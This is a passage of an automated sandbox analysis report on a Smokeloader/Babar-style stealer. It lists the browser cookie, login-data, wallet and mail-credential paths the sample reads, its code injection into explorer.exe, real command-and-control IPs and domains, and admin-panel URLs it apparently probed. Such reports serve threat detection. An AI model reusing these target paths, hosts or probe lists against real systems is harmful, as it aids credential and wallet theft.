                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00652FD7 cpuid 10_2_00652FD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A1F27 GetSystemTimeAsFileTime,10_2_006A1F27
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.4888.exe.6e1000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.4888.exe.6e1000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.4888.exe.610000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2624636439.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.6942.exe.910e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.890e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.8a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.2300e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.fjdvfwi.2310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.6942.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.6942.exe.a70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.wjdvfwi.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.3012627913.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2483457593.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2141424740.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2673791095.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLR
                      Source: 501B.exe, 00000011.00000003.3462791853.0000000003EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: r electroncash BcYhtE72gziJrnt+KgtHZWnEfjc 2038-01-01 00:00:00 193.135.10.219 59999 0
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty`,
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                      Source: Yara matchFile source: 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7064, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.4888.exe.6e1000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.4888.exe.6e1000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.4888.exe.610000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2624636439.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.6942.exe.910e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.890e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.8a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fjdvfwi.2300e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.fjdvfwi.2310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.6942.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.wjdvfwi.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.6942.exe.a70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.wjdvfwi.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.3012627913.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2483457593.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2141424740.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2580234066.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2673791095.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2209831726.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                      Valid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Exfiltration Over Alternative Protocol
                      14
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                      Default Accounts1
                      Exploitation for Client Execution
                      1
                      Registry Run Keys / Startup Folder
                      812
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      Exfiltration Over Bluetooth11
                      Encrypted Channel
                      SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                      Domain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder
                      31
                      Obfuscated Files or Information
                      Security Account Manager135
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      Automated Exfiltration1
                      Non-Standard Port
                      Data Encrypted for ImpactDNS ServerEmail Addresses
                      Local AccountsCronLogin HookLogin Hook13
                      Software Packing
                      NTDS541
                      Security Software Discovery
                      Distributed Component Object Model1
                      Clipboard Data
                      Traffic Duplication5
                      Non-Application Layer Protocol
                      Data DestructionVirtual Private ServerEmployee Names
                      Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets241
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingScheduled Transfer136
                      Application Layer Protocol
                      Data Encrypted for ImpactServerGather Victim Network Information
                      Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion
                      Cached Domain Credentials3
                      Process Discovery
                      VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                      External Remote ServicesSystemd TimersStartup ItemsStartup Items111
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                      Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                      Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt812
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                      Supply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                      Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Regsvr32
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1351848 Sample: file.exe Startdate: 02/12/2023 Architecture: WINDOWS Score: 100 61 wan1.pfprojekt.sk 2->61 63 stualialuyastrelia.net 2->63 65 250 other IPs or domains 2->65 83 Snort IDS alert for network traffic 2->83 85 Multi AV Scanner detection for domain / URL 2->85 87 Found malware configuration 2->87 89 12 other signatures 2->89 9 file.exe 2->9         started        12 fjdvfwi 2->12         started        14 wjdvfwi 2->14         started        signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 9->117 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->119 121 Maps a DLL or memory area into another process 9->121 16 explorer.exe 10 16 9->16 injected 123 Antivirus detection for dropped file 12->123 125 Multi AV Scanner detection for dropped file 12->125 127 Machine Learning detection for dropped file 12->127 129 Checks if the current machine is a virtual machine (disk enumeration) 14->129 131 Creates a thread in another existing process (thread injection) 14->131 process6 dnsIp7 55 humydrole.com 186.182.55.44, 49741, 49742, 49743 TechtelLMDSComunicacionesInteractivasSAAR Argentina 16->55 57 stualialuyastrelia.net 91.215.85.17, 49720, 49730, 49762 PINDC-ASRU Russian Federation 16->57 59 4 other IPs or domains 16->59 45 C:\Users\user\AppData\Roaming\wjdvfwi, PE32 16->45 dropped 47 C:\Users\user\AppData\Roaming\fjdvfwi, PE32 16->47 dropped 49 C:\Users\user\AppData\Local\Temp\6942.exe, PE32 16->49 dropped 51 5 other malicious files 16->51 dropped 75 System process connects to network (likely due to code injection or exploit) 16->75 77 Benign windows process drops PE files 16->77 79 Injects code into the Windows Explorer (explorer.exe) 16->79 81 3 other signatures 16->81 21 4888.exe 16->21         started        24 501B.exe 16->24         started        26 6942.exe 16->26         started        28 6 other processes 16->28 file8 signatures9 process10 signatures11 91 Multi AV Scanner detection for dropped file 21->91 93 Contains functionality to inject code into remote processes 21->93 95 Writes to foreign memory regions 21->95 113 2 other signatures 21->113 30 AppLaunch.exe 4 21->30         started        97 Antivirus detection for dropped file 24->97 99 Machine Learning detection for dropped file 24->99 101 Drops PE files with benign system names 24->101 34 501B.exe 11 24->34         started        103 Detected unpacking (changes PE section rights) 26->103 115 3 other signatures 26->115 105 System process connects to network (likely due to code injection or exploit) 28->105 107 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 28->107 109 Tries to steal Mail credentials (via file / registry access) 28->109 111 Tries to harvest and steal browser information (history, passwords, etc) 28->111 37 WerFault.exe 3 21 28->37         started        39 regsvr32.exe 28->39         started        41 csrss.exe 28->41         started        43 csrss.exe 28->43         started        process12 dnsIp13 67 193.233.132.48, 24324, 49722 FREE-NET-ASFREEnetEU Russian Federation 30->67 133 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->133 135 Found many strings related to Crypto-Wallets (likely being stolen) 30->135 137 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 30->137 139 Tries to harvest and steal browser information (history, passwords, etc) 30->139 69 conceptualintegration.com 66.115.173.188 TOTAL-SERVER-SOLUTIONSUS United States 34->69 71 eremina.net 188.120.236.18 THEFIRST-ASRU Russian Federation 34->71 73 60 other IPs or domains 34->73 53 C:\ProgramData\Drivers\csrss.exe, PE32 34->53 dropped file14 signatures15

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe41%ReversingLabs
                      file.exe44%VirustotalBrowse
                      file.exe100%AviraHEUR/AGEN.1312455
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\4AFA.exe100%AviraHEUR/AGEN.1312455
                      C:\Users\user\AppData\Local\Temp\6942.exe100%AviraHEUR/AGEN.1312455
                      C:\Users\user\AppData\Roaming\fjdvfwi100%AviraHEUR/AGEN.1312455
                      C:\ProgramData\Drivers\csrss.exe100%AviraHEUR/AGEN.1312455
                      C:\Users\user\AppData\Local\Temp\501B.exe100%AviraHEUR/AGEN.1312455
                      C:\Users\user\AppData\Roaming\wjdvfwi100%AviraHEUR/AGEN.1312455
                      C:\Users\user\AppData\Local\Temp\4AFA.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6942.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\451C.dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\fjdvfwi100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\501B.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\wjdvfwi100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe49%ReversingLabsWin32.Trojan.Babar
                      C:\Users\user\AppData\Local\Temp\451C.dll41%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\4888.exe57%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\4AFA.exe49%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\501B.exe49%ReversingLabsWin32.Trojan.Babar
                      C:\Users\user\AppData\Roaming\fjdvfwi41%ReversingLabs
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      mx.mcsmk8.com0%VirustotalBrowse
                      lightseinsteniki.org22%VirustotalBrowse
                      laachir.com0%VirustotalBrowse
                      ms2.aerohosting.cz0%VirustotalBrowse
                      aspmx3.googlemail.com0%VirustotalBrowse
                      pfprojekt.sk0%VirustotalBrowse
                      ace-service.fr0%VirustotalBrowse
                      mcsmk8.com3%VirustotalBrowse
                      azarkavin.com0%VirustotalBrowse
                      finaleasing.it0%VirustotalBrowse
                      mail.aryainstrument.com0%VirustotalBrowse
                      bokod.hu0%VirustotalBrowse
                      la-morada.com0%VirustotalBrowse
                      neugear.ca0%VirustotalBrowse
                      esn.spb.ru0%VirustotalBrowse
                      reign.dk0%VirustotalBrowse
                      mail.hope-mail.com0%VirustotalBrowse
                      dune-architecture.be0%VirustotalBrowse
                      manizan.com0%VirustotalBrowse
                      humydrole.com16%VirustotalBrowse
                      stualialuyastrelia.net26%VirustotalBrowse
                      estbest.ee0%VirustotalBrowse
                      mx1.forwardemail.net0%VirustotalBrowse
                      ext.by0%VirustotalBrowse
                      www.finaleasing.it0%VirustotalBrowse
                      slovtain.sk0%VirustotalBrowse
                      aspmx5.googlemail.com0%VirustotalBrowse
                      attineos.com0%VirustotalBrowse
                      www.slovtain.sk0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://word.office.comM0%URL Reputationsafe
                      http://tonimiuyaytre.org/0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tyiuiunuewqy.org/0%URL Reputationsafe
                      https://outlook.come0%URL Reputationsafe
                      http://liuliuoumumy.org/0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      http://www.w3.o0%URL Reputationsafe
                      http://evropskypravnik.cz/wp-admin/0%Avira URL Cloudsafe
                      http://bokod.hu/wp-login.php0%Avira URL Cloudsafe
                      http://tempuri.org/RestAPI/TreeObject2Response0%Avira URL Cloudsafe
                      http://fedyanin.ws/wp-login.php0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://mgnbizlaw.com/phpMyAdmin/0%Avira URL Cloudsafe
                      http://ershov.org/wp-admin/0%Avira URL Cloudsafe
                      https://evropskypravnik.cz/phpmyadmin/0%Avira URL Cloudsafe
                      http://bokod.hu/phpMyAdmin/0%Avira URL Cloudsafe
                      http://khodyari.com/administrator/index.php0%Avira URL Cloudsafe
                      http://la-morada.com/phpMyAdmin/0%Avira URL Cloudsafe
                      http://3marc.com/pma/0%Avira URL Cloudsafe
                      http://mcsmk8.com/wp-admin/0%Avira URL Cloudsafe
                      http://eremina.net/phpmyadmin/0%Avira URL Cloudsafe
                      http://evropskypravnik.cz/admin0%Avira URL Cloudsafe
                      http://bokod.hu/administrator/0%Avira URL Cloudsafe
                      http://3marc.com/phpMyAdmin/0%Avira URL Cloudsafe
                      http://www.pfprojekt.sk/admin0%Avira URL Cloudsafe
                      http://evropskypravnik.cz/phpMyAdmin/0%Avira URL Cloudsafe
                      http://pfprojekt.sk/admin0%Avira URL Cloudsafe
                      http://fedyanin.ws/wp-admin/0%Avira URL Cloudsafe
                      http://malibusands.net/admin.php0%Avira URL Cloudsafe
                      https://conceptualintegration.com/phpmyadmin/0%Avira URL Cloudsafe
                      https://pfprojekt.sk/phpmyadmin/0%Avira URL Cloudsafe
                      http://jumpnsplashwear.com/phpMyAdmin/0%Avira URL Cloudsafe
                      http://eremina.net/wp-login.php0%Avira URL Cloudsafe
                      https://la-morada.com/phpmyadmin/0%Avira URL Cloudsafe
                      https://khodyari.com/phpMyAdmin/0%Avira URL Cloudsafe
                      http://tempuri.org/RestAPI/TreeObject2ResponseD0%Avira URL Cloudsafe
                      http://3marc.com/wp-admin/0%Avira URL Cloudsafe
                      http://pfprojekt.sk/phpMyAdmin/0%Avira URL Cloudsafe
                      http://malibusands.net/admin0%Avira URL Cloudsafe
                      http://3marc.com/admin.php0%Avira URL Cloudsafe
                      http://malibusands.net/administrator/0%Avira URL Cloudsafe
                      http://tempuri.org/D0%Avira URL Cloudsafe
                      http://evropskypravnik.cz/pma/0%Avira URL Cloudsafe
                      http://jumpnsplashwear.com/administrator/0%Avira URL Cloudsafe
                      http://eremina.net/administrator/0%Avira URL Cloudsafe
                      http://atozrental.cc/atoz/index.php100%Avira URL Cloudmalware
                      https://mgnbizlaw.com/phpmyadmin/0%Avira URL Cloudsafe
                      http://eremina.net/administrator/index.php0%Avira URL Cloudsafe
                      http://www.pfprojekt.sk/phpmyadmin/0%Avira URL Cloudsafe
                      https://khodyari.com/administrator/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mx.mcsmk8.com
                      64.26.60.153
                      truefalseunknown
                      hoster.by
                      178.172.160.19
                      truefalse
                        high
                        lightseinsteniki.org
                        34.143.166.163
                        truetrueunknown
                        w01c2c31.kasserver.com
                        85.13.148.22
                        truefalse
                          high
                          mail.bokod.hu
                          185.111.89.132
                          truefalse
                            unknown
                            fedyanin.ws
                            64.70.19.203
                            truefalse
                              unknown
                              laachir.com
                              213.186.33.87
                              truefalseunknown
                              wan1.pfprojekt.sk
                              195.68.234.252
                              truetrue
                                unknown
                                alt2.aspmx.l.google.com
                                64.233.184.27
                                truefalse
                                  high
                                  ms2.aerohosting.cz
                                  81.31.35.43
                                  truefalseunknown
                                  pfprojekt.sk
                                  195.68.234.252
                                  truetrueunknown
                                  aspmx3.googlemail.com
                                  64.233.184.26
                                  truefalseunknown
                                  mcsmk8.com
                                  64.71.33.31
                                  truetrueunknown
                                  ace-service.fr
                                  185.184.5.1
                                  truefalseunknown
                                  mail.hope-mail.com
                                  5.161.182.241
                                  truefalseunknown
                                  nihcesxway4.hub.nih.gov
                                  128.231.90.119
                                  truefalse
                                    high
                                    nihcesxway3.hub.nih.gov
                                    128.231.90.125
                                    truefalse
                                      high
                                      nihcesxway2.hub.nih.gov
                                      128.231.90.124
                                      truefalse
                                        high
                                        finaleasing.it
                                        89.46.109.16
                                        truetrueunknown
                                        azarkavin.com
                                        193.141.65.97
                                        truefalseunknown
                                        mx.jumpnsplashwear.com
                                        66.96.140.132
                                        truefalse
                                          unknown
                                          bokod.hu
                                          85.255.14.18
                                          truetrueunknown
                                          mailgate.evropskypravnik.cz
                                          81.31.35.50
                                          truetrue
                                            unknown
                                            esn.spb.ru
                                            178.210.89.119
